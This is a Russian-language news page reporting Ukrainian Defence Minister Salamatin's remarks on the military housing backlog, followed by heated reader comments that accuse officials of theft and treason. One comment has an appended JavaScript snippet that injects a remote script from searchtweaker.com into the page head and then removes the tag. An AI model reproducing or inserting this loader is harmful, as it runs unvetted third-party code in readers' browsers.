6572 посетителя онлайн
1 401 26

Саламатин предлагает изменить алгоритм решения жилищного вопроса

Министр обороны Дмитрий Саламатин считает, что нужно менять алгоритм решения вопроса с обеспечением жильем военнослужащих.

Об этом он заявил сегодня, 5 декабря, отвечая на вопросы журналистов, на аэродроме в Кульбакино, после вручения формуляров к двум модернизированным штурмовикам СУ-25 МІ.

В частности министр сказал: «Ситуация (с жильем для военных. - Ред.) очень сложная. За этот год мы заплатили 113 млн грн за те 548 квартир, которые были построены и введены в прошлом году. А рассчитались за них мы в этом году. В этом году 532 квартиры уже выдали, и еще выдадим 739 квартир до конца года, будем очень стараться. Все это вместе, казалось бы большая цифра, по сравнению с прошлым годом - больше, чем в два раза. Вы спросите: хорошо это или плохо? Конечно, хорошо! Довольны ли мы? Нет, не довольны! Удовлетворены ли мы? Нет! Если мы такими темпами будем двигаться, имея 45 тысяч очередников, то как быстро мы можем обеспечить их квартирами?», передает «УНИАН».

По словам Саламатина, сложившаяся ситуация «говорит о том, что сам алгоритм, которым мы пытаемся решить данный вопрос, он не подходит. Значит, надо искать, вырабатывать новые методы решения данного вопроса, чем мы сейчас и занимаемся».

Топ комментарии
+1
да жилья валом Дайте воякам деньги-они сами себе купят!Без долгостроев ,без откатов-деньги вечером,квартира утром- в залог .....контракт на службу!
показать весь комментарий
05.12.2012 21:18 Ответить
+1
в тюрьме ! он предатель !
показать весь комментарий
05.12.2012 21:30 Ответить
+1
Саламатин, ну ты даешь!!! Разве ты не в курсе, что алгоритм уже изменили. В бюджете на 2013 год впервые за годы "незалежности" не выделено ни копейки на строительство жилья военнослужащим.
показать весь комментарий
05.12.2012 21:36 Ответить
Комментировать
Сортировать:
да жилья валом Дайте воякам деньги-они сами себе купят!Без долгостроев ,без откатов-деньги вечером,квартира утром- в залог .....контракт на службу!
показать весь комментарий
05.12.2012 21:18 Ответить
LGF
армия нужна строить дачи убирать мусоросвалки красить траву и т д потому что свободных крепостных не хватает да и выводить деньги из бюджета надо
показать весь комментарий
05.12.2012 21:37 Ответить
Баян
С такими навыками нашу армию боятся во всем мире.))
показать весь комментарий
05.12.2012 21:42 Ответить
Англичанин
Ну так если они ломами могут плац вымести чем мусороуборочная машина, то конечно!!!
показать весь комментарий
05.12.2012 21:45 Ответить
игого
а где можно очередь занять?
показать весь комментарий
05.12.2012 21:57 Ответить
Хих
Шо, тоже хочешь ломом плац подметать ???
показать весь комментарий
05.12.2012 22:01 Ответить
тт
давайте бысттрей стройте, это ж не дело, квартиру купить невозможно
показать весь комментарий
05.12.2012 21:43 Ответить
З партайгеноссе РФ слабо бабла злупити за стоянку ЧФРФ? Дивися, й наколупали б замість вигадування велосипедів....
показать весь комментарий
05.12.2012 21:18 Ответить
самый лучший алгоритм
это разогнать всю эту армию нахер,никому она не нужна,только деньги налогоплатильщиков разворовывает.
показать весь комментарий
05.12.2012 21:19 Ответить
ні
краще направити їх в міжгірья і кончену заспу
показать весь комментарий
05.12.2012 21:31 Ответить
рома
у нас на работе полковник (уже на пенсии) отхватил 5 квартир и ничё, не жужжжжжит ))))
показать весь комментарий
05.12.2012 21:25 Ответить
Петр
Врешь ты Рома. Выдаешь сплетни за истину.
показать весь комментарий
05.12.2012 21:31 Ответить
петру
ну оставь свой эмаил)))
показать весь комментарий
05.12.2012 21:54 Ответить
Гуру
Да, такое возможно. Только по получили генералы, а полковники больше 4-х не получали.(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
показать весь комментарий
17.12.2012 17:25 Ответить
Место Саламатина
в тюрьме ! он предатель !
показать весь комментарий
05.12.2012 21:30 Ответить
Жорж
Саламатин, ну ты даешь!!! Разве ты не в курсе, что алгоритм уже изменили. В бюджете на 2013 год впервые за годы "незалежности" не выделено ни копейки на строительство жилья военнослужащим.
показать весь комментарий
05.12.2012 21:36 Ответить
Васья
5 лет в казарме + 20 в общаге, а теперь можно и разогнать??? = 25 "мимо тазика"!!!
показать весь комментарий
05.12.2012 21:39 Ответить
Іван Сірко
В Бюджеті-2013 забули про Збройні Сили України! Жодної копійки на Фінансування Української Армії не дали! Як Саламатін збирається житло будувати Офіцерам Збройних Сил України? На свої гроші? І взагалі так до Української Армії ще нікто не ставився! Жодної копійки не дали Збройним Силам України! З такою логікою таку Армію взагалі краще розігнати! Техніки в Збройних Силах немає все розкрали! Офіцери безхатченки! Кого така Армія може захистити?
показать весь комментарий
05.12.2012 22:35 Ответить
ГЕНЕРАЛ
ОДЕВАЯ ПОГОНЫ ТЫ ДОЛЖЕН ПОНИМАТЬ ЧТО ПОКА НЕ ОТСЛУЖИШ НИ КАКИХ КВАРТИР НЕ НРАВИТСЯ ИДИ НА ГРАЖДАНКУ ПРОЯВИ СЕБЯ ТАМ ПОСМОТРИМ КАК ТАМ ЗАРАБОТАЕШ ТЫ НА КВАРТИРУ ИЛИ НЕТ
показать весь комментарий
05.12.2012 22:39 Ответить
Чомусь у тих країнах, де МінОборони очолюють не шпигуни з сусідської недружньої держави, забезпечити військових житлом вважається за честь. Або переходять на контрактну службу - і тут держава викладає гроші платників податків на квартири для своїх потенційних захисників.
показать весь комментарий
05.12.2012 22:44 Ответить
Іван Сірко
Саламатін Шпигун Нашого Північного Сусіда! Йому Українська армія до одного Місця! Так грошей в Бюджеті-2013 немає на фінансування Збройних Сил України! Навіть на побудову Житла для Військовослужбовців! Взагалі забули про Українську Армію!
показать весь комментарий
05.12.2012 23:00 Ответить
boss
20 квартир на ЮБК ,(Ялта , Алушта , Севастополь...) и 500 квартир в Крыжопле и Бердичеве. Деньги закончились.
показать весь комментарий
05.12.2012 22:57 Ответить
Гитлер решал "еврейский вопрос", Саламатин-"квартирный" )))Я так понял квартирам придет песец?
показать весь комментарий
06.12.2012 07:03 Ответить
ввв
Попа выходить на барикады !!!!!!
показать весь комментарий
08.12.2012 11:53 Ответить
ввв
ПОРА !!!!!!
показать весь комментарий
08.12.2012 11:54 Ответить
222
а про землянки в 3 наката и забыли!
показать весь комментарий
08.12.2012 14:07 Ответить